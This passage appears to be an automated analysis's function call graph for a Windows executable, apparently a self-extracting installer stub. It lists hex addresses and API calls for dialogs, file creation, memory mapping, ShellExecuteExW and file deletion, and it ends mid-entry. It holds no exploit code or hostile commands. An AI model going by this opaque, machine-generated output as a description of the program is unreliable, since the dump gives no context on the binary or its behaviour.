889aeb DeleteObject 23612->23602 23650 87cacc 23613->23650 23617 87caba 23617->23300 23619 8890c4 GdiplusShutdown OleUninitialize 23618->23619 23619->23315 23620->23306 23621->23313 23622->23536 23624 8920bb 23623->23624 23624->23567 23624->23624 23626 888bf1 SizeofResource 23625->23626 23627 888c23 23625->23627 23626->23627 23628 888c05 LoadResource 23626->23628 23627->23596 23628->23627 23629 888c16 LockResource 23628->23629 23629->23627 23630 888c2a GlobalAlloc 23629->23630 23630->23627 23631 888c41 GlobalLock 23630->23631 23632 888cb8 GlobalFree 23631->23632 23633 888c4c __vswprintf_c_l 23631->23633 23632->23627 23634 888cb1 GlobalUnlock 23633->23634 23642 888b65 GdipAlloc 23633->23642 23634->23632 23637 888ca6 23637->23634 23638 888c90 GdipCreateHBITMAPFromBitmap 23638->23637 23639->23607 23640->23610 23641->23612 23643 888b84 23642->23643 23644 888b77 23642->23644 23643->23634 23643->23637 23643->23638 23646 888924 23644->23646 23647 88894c GdipCreateBitmapFromStream 23646->23647 23648 888945 GdipCreateBitmapFromStreamICM 23646->23648 23649 888951 23647->23649 23648->23649 23649->23643 23651 87cad6 _wcschr __EH_prolog 23650->23651 23652 87cb02 GetModuleFileNameW 23651->23652 23653 87cb33 23651->23653 23654 87cb1c 23652->23654 23673 87973d 23653->23673 23654->23653 23656 879437 72 API calls 23657 87cab3 23656->23657 23669 87ce48 GetModuleHandleW FindResourceW 23657->23669 23658 87cb63 23665 87cc9f 23658->23665 23668 87cce9 23658->23668 23682 879aeb 23658->23682 23690 87990d 23658->23690 23698 8799e0 23658->23698 23659 8799e0 70 API calls 23661 87ccb9 ___std_exception_copy 23659->23661 23663 87990d 73 API calls 23661->23663 23661->23668 23666 87ccdf ___std_exception_copy 23663->23666 23665->23659 23665->23668 23666->23668 23703 8806e9 MultiByteToWideChar 23666->23703 23668->23656 23670 87ce76 23669->23670 23672 87ce70 23669->23672 23671 87c91f 52 API calls 23670->23671 23671->23672 23672->23617 23674 879747 23673->23674 23675 87979d CreateFileW 23674->23675 23676 8797ca GetLastError 23675->23676 23677 87981b 23675->23677 23678 87b275 2 API calls 23676->23678 23677->23658 23679 8797ea 23678->23679 23679->23677 23680 8797ee CreateFileW GetLastError 23679->23680 23681 879812 23680->23681 23681->23677 23683 879b0f SetFilePointer 23682->23683 23685 879afe 23682->23685 23684 879b2d GetLastError 23683->23684 23686 879b48 23683->23686 23684->23686 23688 879b37 23684->23688 23685->23686 23704 876eae 68 API calls 23685->23704 23686->23658 23688->23686 23705 876eae 68 API calls 23688->23705 23693 879924 23690->23693 23692 879985 23692->23658 23693->23692 23694 879977 23693->23694 23696 879987 23693->23696 23706 879613 23693->23706 23718 876e74 68 API calls 23694->23718 23696->23692 23697 879613 5 API calls 23696->23697 23697->23696 23699 879897 2 API calls 23698->23699 23701 8799f4 23699->23701 23700 879a0b 23700->23658 23701->23700 23719 876eae 68 API calls 23701->23719 23703->23668 23704->23683 23705->23686 23707 879621 GetStdHandle 23706->23707 23708 87962c ReadFile 23706->23708 23707->23708 23709 879645 23708->23709 23715 879665 23708->23715 23710 87971a GetFileType 23709->23710 23711 87964c 23710->23711 23712 87965a 23711->23712 23713 87966d GetLastError 23711->23713 23714 87967c 23711->23714 23716 879613 GetFileType 23712->23716 23713->23714 23713->23715 23714->23715 23717 87968c GetLastError 23714->23717 23715->23693 23716->23715 23717->23712 23717->23715 23718->23692 23719->23700 23721 89494d _abort 23720->23721 23722 894965 23721->23722 23724 894a9b _abort GetModuleHandleW 23721->23724 23742 8976d6 EnterCriticalSection 23722->23742 23725 894959 23724->23725 23725->23722 23757 894adf GetModuleHandleExW 23725->23757 23726 894a0b 23746 894a4b 23726->23746 23729 89496d 23729->23726 23731 8949e2 23729->23731 23743 895447 23729->23743 23732 8949fa 23731->23732 23737 8956d0 _abort 5 API calls 23731->23737 23738 8956d0 _abort 5 API calls 23732->23738 23733 894a28 23749 894a5a 23733->23749 23734 894a54 23765 89f149 5 API calls DloadLock 23734->23765 23737->23732 23738->23726 23742->23729 23766 895180 23743->23766 23785 89771e LeaveCriticalSection 23746->23785 23748 894a24 23748->23733 23748->23734 23786 897b13 23749->23786 23752 894a88 23755 894adf _abort 8 API calls 23752->23755 23753 894a68 GetPEB 23753->23752 23754 894a78 GetCurrentProcess TerminateProcess 23753->23754 23754->23752 23756 894a90 ExitProcess 23755->23756 23758 894b09 GetProcAddress 23757->23758 23759 894b2c 23757->23759 23760 894b1e 23758->23760 23761 894b3b 23759->23761 23762 894b32 FreeLibrary 23759->23762 23760->23759 23763 88d783 DloadLock 5 API calls 23761->23763 23762->23761 23764 894b45 23763->23764 23764->23722 23769 89512f 23766->23769 23768 8951a4 23768->23731 23770 89513b ___FrameUnwindToState 23769->23770 23777 8976d6 EnterCriticalSection 23770->23777 23772 895149 23778 8951d0 23772->23778 23776 895167 ___FrameUnwindToState 23776->23768 23777->23772 23781 8951f0 23778->23781 23782 8951f8 23778->23782 23779 88d783 DloadLock 5 API calls 23780 895156 23779->23780 23784 895174 LeaveCriticalSection _abort 23780->23784 23781->23779 23782->23781 23783 8959c2 _free 20 API calls 23782->23783 23783->23781 23784->23776 23785->23748 23787 897b38 23786->23787 23791 897b2e 23786->23791 23788 897735 _abort 5 API calls 23787->23788 23788->23791 23789 88d783 DloadLock 5 API calls 23790 894a64 23789->23790 23790->23752 23790->23753 23791->23789 23934 871019 29 API calls pre_c_initialization 23997 897216 21 API calls 23998 89ee16 CloseHandle 23809 896428 23817 89784c 23809->23817 23812 89643c 23814 896444 23815 896451 23814->23815 23825 896454 11 API calls 23814->23825 23818 897735 _abort 5 API calls 23817->23818 23819 897873 23818->23819 23820 89788b TlsAlloc 23819->23820 23821 89787c 23819->23821 23820->23821 23822 88d783 DloadLock 5 API calls 23821->23822 23823 896432 23822->23823 23823->23812 23824 8963a3 20 API calls 3 library calls 23823->23824 23824->23814 23825->23812 23936 88b820 72 API calls 23964 889123 73 API calls 23840 88c726 19 API calls ___delayLoadHelper2@8 23965 880d3a 26 API calls std::bad_exception::bad_exception 23938 89f830 DeleteCriticalSection 24029 88d736 20 API calls 23967 88a537 93 API calls _swprintf 23968 895536 8 API calls ___vcrt_uninitialize 24030 88d74a 28 API calls 2 library calls 22006 889b4f 22007 889b59 __EH_prolog 22006->22007 22166 8712e7 22007->22166 22010 889b9b 22014 889ba8 22010->22014 22015 889c11 22010->22015 22042 889b87 22010->22042 22011 88a230 22256 88b8bc 22011->22256 22019 889bad 22014->22019 22020 889be4 22014->22020 22018 889cb0 GetDlgItemTextW 22015->22018 22024 889c2b 22015->22024 22016 88a25c 22022 88a265 SendDlgItemMessageW 22016->22022 22023 88a276 GetDlgItem SendMessageW 22016->22023 22017 88a24e SendMessageW 22017->22016 22018->22020 22021 889ce7 22018->22021 22025 87d142 54 API calls 22019->22025 22019->22042 22026 889c05 KiUserCallbackDispatcher 22020->22026 22020->22042 22028 889cff GetDlgItem 22021->22028 22164 889cf0 22021->22164 22022->22023 22274 888b8e GetCurrentDirectoryW 22023->22274 22029 87d142 54 API calls 22024->22029 22030 889bc7 22025->22030 22026->22042 22032 889d39 SetFocus 22028->22032 22033 889d13 SendMessageW SendMessageW 22028->22033 22034 889c4d SetDlgItemTextW 22029->22034 22296 871227 SHGetMalloc 22030->22296 22031 88a2a8 GetDlgItem 22037 88a2c1 22031->22037 22038 88a2c7 SetWindowTextW 22031->22038 22035 889d49 22032->22035 22050 889d55 22032->22050 22033->22032 22039 889c5b 22034->22039 22040 87d142 54 API calls 22035->22040 22037->22038 22275 888fc8 GetClassNameW 22038->22275 22039->22042 22045 889c68 GetMessageW 22039->22045 22056 889c8e TranslateMessage DispatchMessageW 22039->22056 22069 889d53 22040->22069 22041 889bce 22041->22042 22047 889bd2 SetDlgItemTextW 22041->22047 22043 88a1d0 22048 87d142 54 API calls 22043->22048 22045->22039 22045->22042 22047->22042 22051 88a1e0 SetDlgItemTextW 22048->22051 22055 87d142 54 API calls 22050->22055 22053 88a1f4 22051->22053 22058 87d142 54 API calls 22053->22058 22057 889d87 22055->22057 22056->22039 22064 873f5b _swprintf 51 API calls 22057->22064 22065 88a21d 22058->22065 22059 889daa 22184 879cce 22059->22184 22061 88aa45 91 API calls 22062 88a312 22061->22062 22063 88a342 22062->22063 22068 87d142 54 API calls 22062->22068 22074 88aa45 91 API calls 22063->22074 22104 88a3fa 22063->22104 22064->22069 22066 87d142 54 API calls 22065->22066 22066->22042 22073 88a325 SetDlgItemTextW 22068->22073 22176 88b70e GetDlgItem 22069->22176 22070 88a4aa 22076 88a4bc 22070->22076 22077 88a4b3 EnableWindow 22070->22077 22071 889ddf GetLastError 22072 889de6 22071->22072 22190 889023 SetCurrentDirectoryW 22072->22190 22079 87d142 54 API calls 22073->22079 22075 88a35d 22074->22075 22083 88a36f 22075->22083 22105 88a394 22075->22105 22080 88a4d9 22076->22080 22311 8712a4 GetDlgItem EnableWindow 22076->22311 22077->22076 22082 88a339 SetDlgItemTextW 22079->22082 22088 88a500 22080->22088 22096 88a4f8 SendMessageW 22080->22096 22081 889dfc 22086 889e05 GetLastError 22081->22086 22087 889e0f 22081->22087 22082->22063 22309 88859c 6 API calls 22083->22309 22084 88a3ed 22089 88aa45 91 API calls 22084->22089 22086->22087 22095 889e8a 22087->22095 22099 889e9a 22087->22099 22101 889e27 GetTickCount 22087->22101 22088->22042 22092 87d142 54 API calls 22088->22092 22089->22104 22091 88a4cf 22312 8712a4 GetDlgItem EnableWindow 22091->22312 22098 88a519 SetDlgItemTextW 22092->22098 22093 88a388 22093->22105 22095->22099 22100 88a0d3 22095->22100 22096->22088 22097 88a488 22310 88859c 6 API calls 22097->22310 22098->22042 22107 88a06e 22099->22107 22108 889eb2 GetModuleFileNameW 22099->22108 22209 8712c2 GetDlgItem ShowWindow 22100->22209 22191 873f5b 22101->22191 22104->22070 22104->22097 22111 87d142 54 API calls 22104->22111 22105->22084 22112 88aa45 91 API calls 22105->22112 22107->22020 22116 87d142 54 API calls 22107->22116 22297 87de7c 22108->22297 22109 889e44 22194 8794f1 22109->22194 22110 88a4a7 22110->22070 22111->22104 22117 88a3c2 22112->22117 22113 88a0e3 22210 8712c2 GetDlgItem ShowWindow 22113->22210 22121 88a082 22116->22121 22117->22084 22122 88a3cb DialogBoxParamW 22117->22122 22119 88a0ed 22211 87d142 22119->22211 22120 873f5b _swprintf 51 API calls 22124 889efe CreateFileMappingW 22120->22124 22126 873f5b _swprintf 51 API calls 22121->22126 22122->22020 22122->22084 22128 889f60 GetCommandLineW 22124->22128 22160 889fdd __vswprintf_c_l 22124->22160 22130 88a0a0 22126->22130 22133 889f71 22128->22133 22129 889e6a 22134 889e78 22129->22134 22135 889e71 GetLastError 22129->22135 22142 87d142 54 API calls 22130->22142 22131 889fe8 ShellExecuteExW 22155 88a005 22131->22155 22301 8897e4 SHGetMalloc 22133->22301 22202 879437 22134->22202 22135->22134 22136 88a10b SetDlgItemTextW GetDlgItem 22139 88a13c 22136->22139 22140 88a124 GetWindowLongW SetWindowLongW 22136->22140 22219 88aa45 22139->22219 22140->22139 22141 889f8d 22302 8897e4 SHGetMalloc 22141->22302 22142->22020 22146 889f99 22303 8897e4 SHGetMalloc 22146->22303 22147 88a048 22147->22107 22154 88a05e UnmapViewOfFile CloseHandle 22147->22154 22148 88aa45 91 API calls 22150 88a158 22148->22150 22244 88bc78 22150->22244 22151 889fa5 22304 87dfde 22151->22304 22154->22107 22155->22147 22158 88a034 Sleep 22155->22158 22157 889fbc MapViewOfFile 22157->22160 22158->22147 22158->22155 22160->22131 22164->22020 22164->22043 22167 8712f0 22166->22167 22168 871349 22166->22168 22169 871356 22167->22169 22313 87ced7 22167->22313 22331 87ceb0 GetWindowLongW SetWindowLongW 22168->22331 22169->22010 22169->22011 22169->22042 22173 871325 GetDlgItem 22173->22169 22174 871335 22173->22174 22174->22169 22175 87133b SetWindowTextW 22174->22175 22175->22169 22177 88b76a SendMessageW SendMessageW 22176->22177 22178 88b73a 22176->22178 22179 88b7c1 SendMessageW SendMessageW SendMessageW 22177->22179 22180 88b7a2 22177->22180 22183 88b745 ShowWindow SendMessageW SendMessageW 22178->22183 22181 88b80b SendMessageW 22179->22181 22182 88b7ec SendMessageW 22179->22182 22180->22179 22181->22059 22182->22181 22183->22177 22185 879cd8 22184->22185 22186 879d69 22185->22186 22188 879d92 22185->22188 22345 879e86 22185->22345 22187 879e86 9 API calls 22186->22187 22186->22188 22187->22188 22188->22071 22188->22072 22190->22081 22392 873f2e 22191->22392 22195 8794fb 22194->22195 22196 879565 CreateFileW 22195->22196 22197 879559 22195->22197 22196->22197 22198 8795b7 22197->22198 22199 87b275 2 API calls 22197->22199 22198->22129 22200 87959e 22199->22200 22200->22198 22201 8795a2 CreateFileW 22200->22201 22201->22198 22203 87945b 22202->22203 22208 87946c 22202->22208 22204 879467 22203->22204 22205 87946e 22203->22205 22203->22208 22472 8795ea 22204->22472 22477 8794a3 22205->22477 22208->22095 22209->22113 22210->22119 22212 87d172 22211->22212 22213 87d191 LoadStringW 22212->22213 22214 87d17b LoadStringW 22212->22214 22215 87d1a3 22213->22215 22214->22213 22214->22215 22216 87c91f 52 API calls 22215->22216 22217 87d1b1 SetDlgItemTextW 22216->22217 22218 8712c2 GetDlgItem ShowWindow 22217->22218 22218->22136 22220 88aa4f __EH_prolog 22219->22220 22227 88a14a 22220->22227 22492 8896ec ExpandEnvironmentStringsW 22220->22492 22222 88aa86 _wcsrchr 22225 88ad86 SetWindowTextW 22222->22225 22222->22227 22239 88ab6a ___scrt_get_show_window_mode 22222->22239 22493 880b12 CompareStringW 22222->22493 22494 888b8e GetCurrentDirectoryW 22222->22494 22495 87a1a9 7 API calls 22222->22495 22498 87a132 FindClose 22222->22498 22499 889844 69 API calls ___std_exception_copy 22222->22499 22500 8920de 22222->22500 22513 8896ec ExpandEnvironmentStringsW 22222->22513 22225->22222 22227->22148 22231 88ab77 SetFileAttributesW 22233 88ac32 GetFileAttributesW 22231->22233 22231->22239 22235 88ac40 DeleteFileW 22233->22235 22233->22239 22235->22239 22236 88af50 GetDlgItem SetWindowTextW SendMessageW 22236->22239 22238 873f5b _swprintf 51 API calls 22241 88ac75 GetFileAttributesW 22238->22241 22239->22222 22239->22231 22239->22233 22239->22236 22239->22238 22240 88af92 SendMessageW 22239->22240 22496 87b100 52 API calls 2 library calls 22239->22496 22497 87a1a9 7 API calls 22239->22497 22240->22222 22241->22239 22242 88ac86 MoveFileW 22241->22242 22242->22239 22243 88ac9e MoveFileExW 22242->22243 22243->22239 22245 88bc82 __EH_prolog 22244->22245 22525 87f165 69 API calls 22245->22525 22247 88bcb3 22526 875bb7 69 API calls 22247->22526 22249 88bcd1 22527 877b10 74 API calls 2 library calls 22249->22527 22251 88bd15 22528 877c84 22251->22528 22253 88bd24 22537 877ba0 22253->22537 22257 88b8c9 22256->22257 23085 888ac0 22257->23085 22260 88a236 22260->22016 22260->22017 22261 88b8d6 GetWindow 22261->22260 22264 88b8f2 22261->22264 22262 88b8ff GetClassNameW 23090 880b12 CompareStringW 22262->23090 22264->22260 22264->22262 22265 88b988 GetWindow 22264->22265 22266 88b927 GetWindowLongW 22264->22266 22265->22260 22265->22264 22266->22265 22267 88b937 SendMessageW 22266->22267 22267->22265 22268 88b94d GetObjectW 22267->22268 23091 888b22 GetDC GetDeviceCaps ReleaseDC 22268->23091 22270 88b962 23092 888adf GetDC GetDeviceCaps ReleaseDC 22270->23092 23093 888cf3 8 API calls ___scrt_get_show_window_mode 22270->23093 22273 88b972 SendMessageW DeleteObject 22273->22265 22274->22031 22276 888fe9 22275->22276 22277 88900e 22275->22277 23096 880b12 CompareStringW 22276->23096 22278 88901c 22277->22278 22279 889013 SHAutoComplete 22277->22279 22283 889485 22278->22283 22279->22278 22281 888ffc 22281->22277 22282 889000 FindWindowExW 22281->22282 22282->22277 22284 88948f __EH_prolog 22283->22284 22285 87137e 75 API calls 22284->22285 22286 8894b1 22285->22286 23097 871edd 22286->23097 22289 8894da 22292 8718f6 127 API calls 22289->22292 22290 8894cb 22291 87162e 79 API calls 22290->22291 22293 8894d6 22291->22293 22294 8894fc __vswprintf_c_l ___std_exception_copy 22292->22294 22293->22061 22293->22062 22295 87162e 79 API calls 22294->22295 22295->22293 22296->22041 22298 87de85 22297->22298 22299 87de9e 22297->22299 23105 87def3 22298->23105 22299->22120 22301->22141 22302->22146 22303->22151 22305 87dfed ___scrt_get_show_window_mode 22304->22305 22306 87e004 22304->22306 22305->22157 22307 87def3 73 API calls 22306->22307 22307->22305 22309->22093 22310->22110 22311->22091 22312->22080 22332 87c88e 22313->22332 22315 87cefd GetWindowRect GetClientRect 22316 87cff2 22315->22316 22321 87cf57 22315->22321 22317 87d034 GetSystemMetrics GetWindow 22316->22317 22318 87cffc GetWindowTextW 22316->22318 22319 87d054 22317->22319 22335 87c91f 22318->22335 22323 871312 22319->22323 22325 87d060 GetWindowTextW 22319->22325 22327 87c91f 52 API calls 22319->22327 22328 87d0a6 GetWindowRect 22319->22328 22329 87d11b GetWindow 22319->22329 22321->22317 22322 87cfb8 GetWindowLongW 22321->22322 22326 87cfe2 GetWindowRect 22322->22326 22323->22169 22323->22173 22324 87d028 SetWindowTextW 22324->22317 22325->22319 22326->22316 22330 87d093 SetWindowTextW 22327->22330 22328->22329 22329->22319 22329->22323 22330->22319 22331->22169 22333 87c91f 52 API calls 22332->22333 22334 87c8b6 _wcschr 22333->22334 22334->22315 22336 87c929 22335->22336 22337 87c99d _strlen 22336->22337 22342 87c9fb _wcschr _wcsrchr 22336->22342 22343 880905 WideCharToMultiByte 22336->22343 22344 880905 WideCharToMultiByte 22337->22344 22340 87c9c8 _strlen 22341 873f5b _swprintf 51 API calls 22340->22341 22341->22342 22342->22324 22343->22337 22344->22340 22346 879e93 22345->22346 22347 879eb7 22346->22347 22348 879eaa CreateDirectoryW 22346->22348 22358 879dff 22347->22358 22348->22347 22350 879eea 22348->22350 22355 879ef9 22350->22355 22371 87a0c3 22350->22371 22352 879efd GetLastError 22352->22355 22355->22185 22356 879ed3 22356->22352 22357 879ed7 CreateDirectoryW 22356->22357 22357->22350 22357->22352 22379 879e13 22358->22379 22361 87b275 22362 87b282 22361->22362 22370 87b28c 22362->22370 22389 87b40f CharUpperW 22362->22389 22364 87b29b 22390 87b43b CharUpperW 22364->22390 22366 87b2aa 22367 87b325 GetCurrentDirectoryW 22366->22367 22368 87b2ae 22366->22368 22367->22370 22391 87b40f CharUpperW 22368->22391 22370->22356 22372 88cec0 22371->22372 22373 87a0d0 SetFileAttributesW 22372->22373 22374 87a0e6 22373->22374 22375 87a113 22373->22375 22376 87b275 2 API calls 22374->22376 22375->22355 22377 87a0fa 22376->22377 22377->22375 22378 87a0fe SetFileAttributesW 22377->22378 22378->22375 22387 88cec0 22379->22387 22382 879e31 22384 87b275 2 API calls 22382->22384 22383 879e08 22383->22352 22383->22361 22385 879e45 22384->22385 22385->22383 22386 879e49 GetFileAttributesW 22385->22386 22386->22383 22388 879e20 GetFileAttributesW 22387->22388 22388->22382 22388->22383 22389->22364 22390->22366 22391->22370 22393 873f45 ___scrt_initialize_default_local_stdio_options 22392->22393 22396 8934dd 22393->22396 22399 8921bb 22396->22399 22400 8921fb 22399->22400 22401 8921e3 22399->22401 22400->22401 22402 892203 22400->22402 22423 895e3e 20 API calls _abort 22401->22423 22425 892636 22402->22425 22405 8921e8 22424 895d1d 26 API calls _abort 22405->22424 22407 8921f3 22416 88d783 22407->22416 22411 873f4f 22411->22109 22412 89228b 22434 89283c 51 API calls 3 library calls 22412->22434 22415 892296 22435 8926b9 20 API calls _free 22415->22435 22417 88d78c 22416->22417 22418 88d78e IsProcessorFeaturePresent 22416->22418 22417->22411 22420 88ddb8 22418->22420 22436 88dd7c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22420->22436 22422 88de9b 22422->22411 22423->22405 22424->22407 22426 892213 22425->22426 22427 892653 22425->22427 22433 892601 20 API calls 2 library calls 22426->22433 22427->22426 22437 89631f GetLastError 22427->22437 22429 892674 22458 89646e 38 API calls __fassign 22429->22458 22431 89268d 22459 89649b 38 API calls __fassign 22431->22459 22433->22412 22434->22415 22435->22407 22436->22422 22438 896341 22437->22438 22439 896335 22437->22439 22461 895a8d 20 API calls 3 library calls 22438->22461 22460 8978f8 11 API calls 2 library calls 22439->22460 22442 89633b 22442->22438 22444 89638a SetLastError 22442->22444 22443 89634d 22445 896355 22443->22445 22468 89794e 11 API calls 2 library calls 22443->22468 22444->22429 22462 8959c2 22445->22462 22448 89636a 22448->22445 22449 896371 22448->22449 22469 896191 20 API calls _abort 22449->22469 22450 89635b 22452 896396 SetLastError 22450->22452 22470 895a4a 38 API calls _abort 22452->22470 22453 89637c 22455 8959c2 _free 20 API calls 22453->22455 22457 896383 22455->22457 22457->22444 22457->22452 22458->22431 22459->22426 22460->22442 22461->22443 22463 8959f6 _free 22462->22463 22464 8959cd RtlFreeHeap 22462->22464 22463->22450 22464->22463 22465 8959e2 22464->22465 22471 895e3e 20 API calls _abort 22465->22471 22467 8959e8 GetLastError 22467->22463 22468->22448 22469->22453 22471->22467 22473 8795f3 22472->22473 22474 8795f7 22472->22474 22473->22208 22474->22473 22483 879dac 22474->22483 22478 8794cd 22477->22478 22479 8794af 22477->22479 22480 8794ec 22478->22480 22491 876d80 67 API calls 22478->22491 22479->22478 22481 8794bb FindCloseChangeNotification 22479->22481 22480->22208 22481->22478 22484 88cec0 22483->22484 22485 879db9 DeleteFileW 22484->22485 22486 879611 22485->22486 22487 879dcc 22485->22487 22486->22208 22488 87b275 2 API calls 22487->22488 22489 879de0 22488->22489 22489->22486 22490 879de4 DeleteFileW 22489->22490 22490->22486 22491->22480 22492->22222 22493->22222 22494->22222 22495->22222 22496->22239 22497->22239 22498->22222 22499->22222 22501 895aea 22500->22501 22502 895b02 22501->22502 22503 895af7 22501->22503 22505 895b0a 22502->22505 22512 895b13 ___InternalCxxFrameHandler 22502->22512 22514 8959fc 22503->22514 22508 8959c2 _free 20 API calls 22505->22508 22506 895b18 22521 895e3e 20 API calls _abort 22506->22521 22507 895b3d HeapReAlloc 22510 895aff 22507->22510 22507->22512 22508->22510 22510->22222 22512->22506 22512->22507 22522 8946ca 7 API calls 2 library calls 22512->22522 22513->22222 22515 895a3a 22514->22515 22516 895a0a ___InternalCxxFrameHandler 22514->22516 22524 895e3e 20 API calls _abort 22515->22524 22516->22515 22518 895a25 RtlAllocateHeap 22516->22518 22523 8946ca 7 API calls 2 library calls 22516->22523 22518->22516 22519 895a38 22518->22519 22519->22510 22521->22510 22522->22512 22523->22516 22524->22519 22525->22247 22526->22249 22527->22251 22529 877c8e 22528->22529 22531 877cf8 22529->22531 22563 87a145 22529->22563 22532 877d62 22531->22532 22535 87a145 8 API calls 22531->22535 22541 87820b 22531->22541 22534 877da4 22532->22534 22569 876d0d 67 API calls 22532->22569 22534->22253 22535->22531 22538 877bae 22537->22538 22540 877bb5 22537->22540 22539 880e21 79 API calls 22538->22539 22539->22540 22542 878215 __EH_prolog 22541->22542 22570 87137e 22542->22570 22544 878230 22578 879ba2 22544->22578 22550 87825f 22698 87162e 22550->22698 22551 8782fa 22597 8783a3 22551->22597 22555 87835a 22601 871e8e 22555->22601 22556 87825b 22556->22550 22556->22551 22561 87a145 8 API calls 22556->22561 22702 87b6cb CompareStringW 22556->22702 22559 878365 22559->22550 22605 873a20 22559->22605 22615 878409 22559->22615 22561->22556 22564 87a15a 22563->22564 22565 87a15e 22564->22565 23073 87a273 22564->23073 22565->22529 22567 87a16e 22567->22565 22568 87a173 FindClose 22567->22568 22568->22565 22569->22534 22571 871383 __EH_prolog 22570->22571 22704 87c413 22571->22704 22573 8713ba 22577 871413 ___scrt_get_show_window_mode 22573->22577 22710 88cdae 22573->22710 22577->22544 22579 879bad 22578->22579 22580 878246 22579->22580 22735 876e66 67 API calls 22579->22735 22580->22550 22582 8719b1 22580->22582 22583 8719bb __EH_prolog 22582->22583 22590 8719fd 22583->22590 22596 8719e4 22583->22596 22736 87135c 22583->22736 22585 871b16 22739 876d0d 67 API calls 22585->22739 22587 873a20 90 API calls 22592 871b6d 22587->22592 22588 871b26 22588->22587 22588->22596 22589 871bb7 22595 871bea 22589->22595 22589->22596 22740 876d0d 67 API calls 22589->22740 22590->22585 22590->22588 22590->22596 22592->22589 22593 873a20 90 API calls 22592->22593 22593->22592 22594 873a20 90 API calls 22594->22595 22595->22594 22595->22596 22596->22556 22598 8783b0 22597->22598 22758 87ffb8 GetSystemTime SystemTimeToFileTime 22598->22758 22600 878314 22600->22555 22703 8806c8 65 API calls 22600->22703 22603 871e93 __EH_prolog 22601->22603 22602 871ec7 22602->22559 22603->22602 22760 8718f6 22603->22760 22606 873a30 22605->22606 22607 873a2c 22605->22607 22608 873a5d 22606->22608 22610 873a4f 22606->22610 22607->22559 23000 87276c 90 API calls 3 library calls 22608->23000 22609 873a8f 22609->22559 22610->22609 22999 873203 78 API calls 3 library calls 22610->22999 22613 873a5b 22613->22609 23001 871fd2 67 API calls 22613->23001 22616 878413 __EH_prolog 22615->22616 22617 87844f 22616->22617 22648 878453 22616->22648 23030 8877e7 93 API calls 22616->23030 22618 878478 22617->22618 22623 8784ff 22617->22623 22617->22648 22619 87849a 22618->22619 22618->22648 23031 877a2f 151 API calls 22618->23031 22619->22648 23032 8877e7 93 API calls 22619->23032 22623->22648 23002 875d98 22623->23002 22625 87858c 22625->22648 23010 8780f8 22625->23010 22628 8786e9 22629 87a145 8 API calls 22628->22629 22631 87874d 22628->22631 22629->22631 22630 87c57d 73 API calls 22635 8787a7 _memcmp 22630->22635 23014 877c11 22631->23014 22633 8788d1 22634 8789a0 22633->22634 22640 87891f 22633->22640 22639 8789fb 22634->22639 22651 8789ab 22634->22651 22635->22630 22635->22633 22636 8788ca 22635->22636 22635->22648 23033 8780a6 75 API calls 22635->23033 23034 876d0d 67 API calls 22635->23034 23035 876d0d 67 API calls 22636->23035 22650 87898f 22639->22650 23038 877f88 89 API calls 22639->23038 22643 879dff 4 API calls 22640->22643 22640->22650 22641 878fb5 22645 879437 72 API calls 22641->22645 22642 8789f9 22644 879437 72 API calls 22642->22644 22647 878956 22643->22647 22644->22648 22645->22648 22647->22650 23036 879161 89 API calls 22647->23036 22648->22559 22649 878a64 22649->22641 22662 878acd 22649->22662 23039 87971a 22649->23039 22650->22642 22650->22649 22651->22642 23037 877dc4 93 API calls ___InternalCxxFrameHandler 22651->23037 22652 87a6a9 8 API calls 22655 878b1c 22652->22655 22658 87a6a9 8 API calls 22655->22658 22657 878aa5 22657->22662 23043 871f18 67 API calls 22657->23043 22672 878b32 22658->22672 22660 878abb 23044 876f67 68 API calls 22660->23044 22662->22652 22663 878bd5 22664 878d22 22663->22664 22665 878c1e 22663->22665 22669 878d34 22664->22669 22670 878d48 22664->22670 22688 878c4e 22664->22688 22666 878c8e 22665->22666 22668 878c2e 22665->22668 22667 8780f8 CharUpperW 22666->22667 22673 878ca9 22667->22673 22674 878c72 22668->22674 22678 878c3c 22668->22678 22675 8790d0 120 API calls 22669->22675 22676 881fa9 68 API calls 22670->22676 22672->22663 23020 879869 22672->23020 22681 878cd2 22673->22681 22682 878cd9 22673->22682 22673->22688 22674->22688 23046 8777d4 101 API calls 22674->23046 22675->22688 22677 878d61 22676->22677 22679 881c40 120 API calls 22677->22679 23045 871f18 67 API calls 22678->23045 22679->22688 23047 877586 77 API calls ___InternalCxxFrameHandler 22681->23047 23048 87900e 85 API calls __EH_prolog 22682->23048 22686 878e6c 22686->22641 22687 878edb 22686->22687 23050 879b6a SetEndOfFile 22686->23050 23025 879a12 22687->23025 22688->22686 23049 871f18 67 API calls 22688->23049 22692 878f35 22693 8794a3 68 API calls 22692->22693 22694 878f40 22693->22694 22694->22641 22695 87a0c3 4 API calls 22694->22695 22696 878f9f 22695->22696 22696->22641 23051 871f18 67 API calls 22696->23051 22699 871640 22698->22699 23072 87c4b6 79 API calls 22699->23072 22702->22556 22703->22555 22705 87c41d __EH_prolog 22704->22705 22706 88cdae new 8 API calls 22705->22706 22707 87c460 22706->22707 22708 88cdae new 8 API calls 22707->22708 22709 87c484 22708->22709 22709->22573 22715 88cdb3 ___std_exception_copy 22710->22715 22711 871400 22711->22577 22716 87ac66 22711->22716 22715->22711 22722 8946ca 7 API calls 2 library calls 22715->22722 22723 88d83a RaiseException Concurrency::cancel_current_task new 22715->22723 22724 88d81d RaiseException Concurrency::cancel_current_task 22715->22724 22717 87ac70 __EH_prolog 22716->22717 22725 87ddc2 73 API calls 22717->22725 22719 87ac82 22726 87ad7e 22719->22726 22722->22715 22725->22719 22727 87ad90 ___scrt_get_show_window_mode 22726->22727 22730 87fce6 22727->22730 22733 87fca6 GetCurrentProcess GetProcessAffinityMask 22730->22733 22734 87acf8 22733->22734 22734->22577 22735->22580 22741 871705 22736->22741 22738 871378 22738->22590 22739->22596 22740->22595 22742 87171b 22741->22742 22753 871773 __vswprintf_c_l 22741->22753 22743 871744 22742->22743 22754 876dd3 67 API calls __vswprintf_c_l 22742->22754 22745 87179a 22743->22745 22750 871760 ___std_exception_copy 22743->22750 22747 8920de 22 API calls 22745->22747 22746 87173a 22755 876e0b 68 API calls 22746->22755 22749 8717a1 22747->22749 22749->22753 22757 876e0b 68 API calls 22749->22757 22750->22753 22756 876e0b 68 API calls 22750->22756 22753->22738 22754->22746 22755->22743 22756->22753 22757->22753 22759 87ffe8 __vswprintf_c_l 22758->22759 22759->22600 22761 8718fb __EH_prolog 22760->22761 22762 87190f 22761->22762 22763 871934 22761->22763 22765 871964 22761->22765 22762->22602 22764 873a20 90 API calls 22763->22764 22764->22762 22769 873e69 22765->22769 22773 